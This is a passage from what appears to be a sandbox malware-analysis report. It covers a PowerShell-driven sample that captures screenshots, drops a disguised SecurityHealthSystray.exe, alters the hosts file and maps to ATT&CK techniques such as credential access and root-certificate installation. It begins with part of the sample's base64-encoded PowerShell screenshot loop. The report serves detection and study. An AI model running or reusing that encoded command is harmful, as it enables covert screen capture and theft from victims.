ByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of WriteProcessMemory
  PID:4684
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jqf50jar\jqf50jar.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2220
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF0F7.tmp" "c:\Users\Admin\AppData\Local\Temp\jqf50jar\CSC23742D5CF5AF400CAB424752D3B89F20.TMP"
      4⤵
      PID:1560

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1900
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fff5c57ab58,0x7fff5c57ab68,0x7fff5c57ab78
  2⤵
  PID:892
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1512 --field-trial-handle=1744,i,10681988356746097273,136710739018361247,131072 /prefetch:2
  2⤵
  PID:5052
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2108 --field-trial-handle=1744,i,10681988356746097273,136710739018361247,131072 /prefetch:8
  2⤵
  PID:4968
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2196 --field-trial-handle=1744,i,10681988356746097273,136710739018361247,131072 /prefetch:8
  2⤵
  PID:2128
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3048 --field-trial-handle=1744,i,10681988356746097273,136710739018361247,131072 /prefetch:1
  2⤵
  PID:2316
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3116 --field-trial-handle=1744,i,10681988356746097273,136710739018361247,131072 /prefetch:1
  2⤵
  PID:1500
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4280 --field-trial-handle=1744,i,10681988356746097273,136710739018361247,131072 /prefetch:1
  2⤵
  PID:2268
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4644 --field-trial-handle=1744,i,10681988356746097273,136710739018361247,131072 /prefetch:8
  2⤵
  PID:5096
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4788 --field-trial-handle=1744,i,10681988356746097273,136710739018361247,131072 /prefetch:8
  2⤵
  PID:2092
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4872 --field-trial-handle=1744,i,10681988356746097273,136710739018361247,131072 /prefetch:8
  2⤵
  PID:3808
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=5088 --field-trial-handle=1744,i,10681988356746097273,136710739018361247,131072 /prefetch:1
  2⤵
  PID:3248
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=4900 --field-trial-handle=1744,i,10681988356746097273,136710739018361247,131072 /prefetch:1
  2⤵
  PID:3312
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=4936 --field-trial-handle=1744,i,10681988356746097273,136710739018361247,131072 /prefetch:1
  2⤵
  PID:4416

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
1⤵
PID:332

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {3eef301f-b596-4c0b-bd92-013beafce793} -Embedding
1⤵
PID:3300

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3564

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000001

Filesize
211KB

MD5
151fb811968eaf8efb840908b89dc9d4

SHA1
7ec811009fd9b0e6d92d12d78b002275f2f1bee1

SHA256
043fd8558e4a5a60aaccd2f0377f77a544e3e375242e9d7200dc6e51f94103ed

SHA512
83aface0ab01da52fd077f747c9d5916e3c06b0ea5c551d7d316707ec3e8f3f986ce1c82e6f2136e48c6511a83cb0ac67ff6dc8f0e440ac72fc6854086a87674

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
888B

MD5
89eb79a21ebb533c15ea102c84c2d48d

SHA1
ab88bcf49c8f509a98e89348c4ec4dd3455be97f

SHA256
c14f1f9d560dec4a421efe352a975748c7fd2be27b6e0660b5344df236723861

SHA512
6e2716c57851a0af9695be56401e8519d85651e511c2272f4d93a25a155b1996ea07d288441d1622b14a939904b05c16d600ca3c8b234ec2ae7158bc607e7086

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
168B

MD5
782419fefd119e5d1a101ff8df07abec

SHA1
2172686b077fe85c145caf18d4e5520c083f2b28

SHA256
c4c74cca202230662ac2074350a4a3db99663f5978ced5f3bcd3fe6c2d14ef90

SHA512
741c727f1b53b3415c4cabd2e3d4482b6e032786c5ce095e5e0e9ff09cbab6aec978419e5149c4d5e665917904482a90c4a082bd31909e76eec6b3879d3cfac6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1

Filesize
264KB

MD5
ad234ff3d0669e446d0dcf229ee77538

SHA1
7ea587ecf8b18eaa1efc3db2940b3bcd0118556a

SHA256
bf47c672965386106e8129d15c6a6bb41947001da9992a3d684ee56907f379a2

SHA512
383590db9fd8eed267b51ac4e0da223834fc0b7e16419d1806377c549becb50a35adc4eaf1d5393feaf58316cee07e413a31c79cb29225ef324ab7b11f0f8769

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
3KB

MD5
82c32e4bcb2aaa26143b758f16fb9d40

SHA1
16f597272b89129eb1a68758e9f1b3907d662a0e

SHA256
a5c070c43fc0d8e3f01da663990a63cd253053f21d148073512a1ea8c8da269c

SHA512
6a651868b8277852ead814a4c59d9d22381e6986105bddea0fcfde2521fd46e3b0a9482ed0d57325e5342e39201773290a8ffcc709efc30699156a03759c57e2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
3KB

MD5
ef079de6ab0f1ed7d94362507c758b52

SHA1
28554bc55edc227269df54f950c9a3f412ad1d8d

SHA256
e3aa678588eab1bda30129df1d50330516b8b6fbf3a78df9e870bb2ffd9e6337

SHA512
a3e8fe198bbf961db0321e426d88bfbc2ddf0d7f109649ab1b881b1cef56a20603c395fc4321d5a0cb93aa5a13d799060720059cd14835165da7221a5cedda19

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
686B

MD5
40b292a9b6261e7a1ebdc3e0d4e0e71e

SHA1
79040004554a9043e2f4d76c1af4333aeb0e7a68

SHA256
0d57d6c27b63d6fdbe1eeedfaee858b5186f0caf3f8bb6c92c5bc2287e253e87

SHA512
3446c72a2ebbbeab8b227cfff38d263adb270e2ffbf31e1808ef42a7db1dd7079456dd37a2275ab0dfd3eba7f1d9d16dc2215e85597e97b8d4d7e1ecd439fd55

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
354B

MD5
9fe979979e147c17431c433d5854666b

SHA1
6ed59b8188758f12b76ae7cb144106fe400123ea

SHA256
5a60c66bea30b0c4c78bb576ef6ac4eb11e3e34084fa050c62c4bac0bd9c0473

SHA512
d8bd67e5e0e65ea181e0150446dec95dde9da8e686594b3b6160e5b58982fd3514f3cbf6dcd1d97a62285b97b771aa611c6867e190ae6a48e2d8bb33b8077ec9

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
7KB

MD5
a7f48e9eaa26b2864d21212d60c4b702

SHA1
43327b4395bc3ff4527f6e100f4e650d5d9c33b4

SHA256
af9047274c9aeaf60a8e25fdaeb751de920c89d6e1826bb04f48cc6f596a9251

SHA512
98d778fdf9d608f5002ef6a2c8a94eb1928964ed3d060e5bd80393755c36a1a3ac422b5eeb1a7e195c017ecc766f9e6d1851b87cb05d9225fab5d23ef48a3369

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
7KB

MD5
545aaab06c86337c2cf1090b6959ee38

SHA1
38b4b767c6bb5215016471d83c10e6228176520d

SHA256
094d6c0fcfe57208317ca1f296bd0ef5f141850e345613171d1b03e76f0e5060

SHA512
329a8385e09e0a5be618820a30367f308c4f3d285572d0b55dc25a69ca703ea5bc873bcfe0546912c6784eda991db3f0a65bee8f7684bcc3528174fceb76dedb

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
7KB

MD5
8b629729e16564d934bdbb6b2b5b1ade

SHA1
8d7cd7269684565a473bfb4ba6ee19561cfc48bf

SHA256
0e4af1e5d2d3d7008bcbacfe121e051cb6e156f21b42e0d8c7b67be715a87bfc

SHA512
5826697d525b3df7477115f32e59a163d5d55ab0e55b226e69b1e7fe7d2d599472e1a6bd0cd85b6973f6254b471263b450bae751bd651889cc6aadfca158e2b7

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
16KB

MD5
69281f7b67c3f7fba0956c2442edb4b6

SHA1
43629469d7e5f46d1c2666d9e808c25e2ade832e

SHA256
425f45b03c0cbc094707f35d1fa63ca455690514a8e607dd4abf070ee80ce1ee

SHA512
ed1bba7596afbb4bd5b6f225a4dc9b7b18d88fee52c8fe071b9d6cb5a1900636f34847641a53d1bfa8d050d830c4a1a47be0557eba1d3021a58e65669f26c063

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
120B

MD5
307caec79d026f2cc696eff0f92e5c71

SHA1
c97c3289e26cba5567a817ec1382e2a264b70b88

SHA256
a3ec5134c84c65c4c29691a7d961f1a0e6c18ac08d6571196f3d123b1f46a610

SHA512
1c465055476a96b6bdc9aa6eb86951d0c67ae0216f0bd349ceada5fbffc7939fcf5ef525885357b7393b94ba34f7c0a8dceeea984670f242c3995c6211665317

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\f0dbc86b-84c8-4814-9b4d-fa0e9da0dbd5.tmp

Filesize
7KB

MD5
c9d62a204adeda6cb5040198cca55b56

SHA1
9d8266169fefc34a77955394d7d8ea1c3015755b

SHA256
e10b385c17d558ba15ce181757c992921c59ea5e9f498aa455839dd354a32683

SHA512
eb0933128ecac1c6362326fa8ca883387f0e4a94b604164623748f2457ab9af321c60dfc2cd2b74a60226f157ee340e83ff3f16527eb2bb3859a7db5b7ac8582

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
285KB

MD5
6982e5c8d573289372da6beba43784af

SHA1
733ed984e9c8ddb5cbd30e5883233eb582e42da5

SHA256
5de982ce00a274bbd3ecd966b809c191e8d6d9c71d8cfbb5512263535f527d56

SHA512
52ec2de139f7c3debb41d8c08ff57bfaa7f9dd9bf25d27f9556f5f2604190abc529c69da75cb74bbfb3d9d906c2b679a5e814e749dd21c5d036408be82211fc4

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
285KB

MD5
aaaf44169743fb3d63f094521200e571

SHA1
60b22f92fbb93ffd27c0857f26224875590a8e73

SHA256
4d5c1226bdcb8e30d84b9e0cbb37de6c04784a8c36c0c9725a345f5b24dc30da

SHA512
6c791fc0c4243aac76dca395e7527d56cfca0ff1b888de4952eb5488b40c09609e104c176fe2b63ae61a543684fc435278b5077901f0f5f93b0d5c6e7d69a07f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
627073ee3ca9676911bee35548eff2b8

SHA1
4c4b68c65e2cab9864b51167d710aa29ebdcff2e

SHA256
85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

SHA512
3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
1a9fa92a4f2e2ec9e244d43a6a4f8fb9

SHA1
9910190edfaccece1dfcc1d92e357772f5dae8f7

SHA256
0ee052d5333fd5fd86bc84856fec98e045f077a7ac8051651bf7c521b9706888

SHA512
5d2361476fa22200e6f83883efe7dcb8c3fe7dae8d56e04e28a36e9ae1270c327b6aa161d92b239593da7661289d002c574446ecfd6bd19928209aae25e3ef64

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
5b705b4839f481b2485f2195c589cad0

SHA1
a55866cd9e6fedf352d0e937101755ea61a50c86

SHA256
f6a3b94a63de605bbbcf1e95cb2d743166f44ea7e9d0d2bfa0e88c94c26e37c6

SHA512
f228eccd5646068a81e79baeaf7e8bfa470b30d503bf0ca8cc746c009510ab609b5c091cadf08fab1e3581900cdb7834c775c61a95a29c2d73ccd0dcbd851bab

Download Submit
C:\Users\Admin\AppData\Local\Temp\9fS4o3N9ZP\Display (1).png

Filesize
407KB

MD5
3460324a848656c2b4368cb5cbe1a8f1

SHA1
d53f4dad9711882c2fc0f07d8037eb0352606115

SHA256
e023f07b0b685b571f26d6d1da35e3db2f048cf5dbca9a7454c6e4feda103de4

SHA512
04dae3197d578842473c878c94c0e136151208a9e8f3754d8efdd5899a3c85701e01f17292c7b4ada563c3dd356bc394ba33932a674d24b4cf6dd1c85177ac9b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESF0F7.tmp

Filesize
1KB

MD5
0da234e8de85803b4fac8176a9df746c

SHA1
67e5bf634aa5da863b85070cf25aca4bbd0b6240

SHA256
a72491a38966243295757b3a02540d2ce55677c6fc5a776d0136a7854cf72c41

SHA512
a39111ad950c2154c067fe56408db88aceecd5846b012a196ff1f7603d5211479b9b75f343dbbf83238af17fe86a231941ec27edfb434534364af21b6001bd7e

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yjwrl0ia.zhm.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\jqf50jar\jqf50jar.dll

Filesize
4KB

MD5
f0edad3249243f2268e6c21a98efa187

SHA1
ec571a1736e74b9aa22a20fba2a20ba858cbc95f

SHA256
c8342c94b121c9199d2fa125db6c507607abed9ca1326e4054edd8b13d3eb770

SHA512
452cd66807ef715f65d3adb30cb26bb9b5806edcacf26965ac0d0cd581702d4146118019072ff6810160c01a577058c3057dcea4317e1c39533eaf580bc81275

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe

Filesize
9.3MB

MD5
df99beb55f643551ae73184125d723ec

SHA1
9ea0ac60ec61a64dcb9eb21509b76ee8799434d5

SHA256
e8692661ffd0327708f581369c56af975a541c6565b97af794c8b7adfa297c15

SHA512
b5cf419550d3331cbc1ff32a78b9bcc4f5694bbf2de351bb4d6d6812d705726d5651306ce8a9ac7fec82ad3c3922228dc5c09e49daf5b65528b2e09a02227f98

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
6e2386469072b80f18d5722d07afdc0b

SHA1
032d13e364833d7276fcab8a5b2759e79182880f

SHA256
ade1813ae70d7da0bfe63d61af8a4927ed12a0f237b79ce1ac3401c0646f6075

SHA512
e6b96f303935f2bbc76f6723660b757d7f3001e1b13575639fb62d68a734b4ce8c833b991b2d39db3431611dc2cacde879da1aecb556b23c0d78f5ee67967acb

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\jqf50jar\CSC23742D5CF5AF400CAB424752D3B89F20.TMP

Filesize
652B

MD5
b2ed974a5b30e9ce8feb4f49a9ffd04f

SHA1
6edefbc95f130bc3d352a984abcd4989cc98486d

SHA256
cd6cf9ed78e246eb6e5db538aced0970f1f27cd12e4b097b4fd68e5c79ca7134

SHA512
14591382900449422820490b1847a0a8779cb09955cd704aaf9a296793135d4d49a9e884fadfe0735691064d364ff0ddbd3f00409b9eb4811e3079465ea459ae

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\jqf50jar\jqf50jar.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\jqf50jar\jqf50jar.cmdline

Filesize
607B

MD5
79e32b195f74431922b0b89733bf41fe

SHA1
7339920fdeacca3af6f1535d45cb2041760030b6

SHA256
53e806c51cbcced923497a04668ce35ce4e262accc4fd0130ca57800c9312f11

SHA512
996de39446ac8f71fae2803212f9e9ac4438498102c026585534b8a91e6b50465d6fdef5bd83bd00acf6fc41ecf9ca4bb0f90fa035733d68606c841ef4816c6f

Download Submit
\??\pipe\crashpad_1900_LWHURHFAUBMBZPWL

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/2136-11-0x00000164349E0000-0x0000016434A02000-memory.dmp

Filesize
136KB

Download
memory/4684-51-0x000001C2365A0000-0x000001C2365A8000-memory.dmp

Filesize
32KB

Download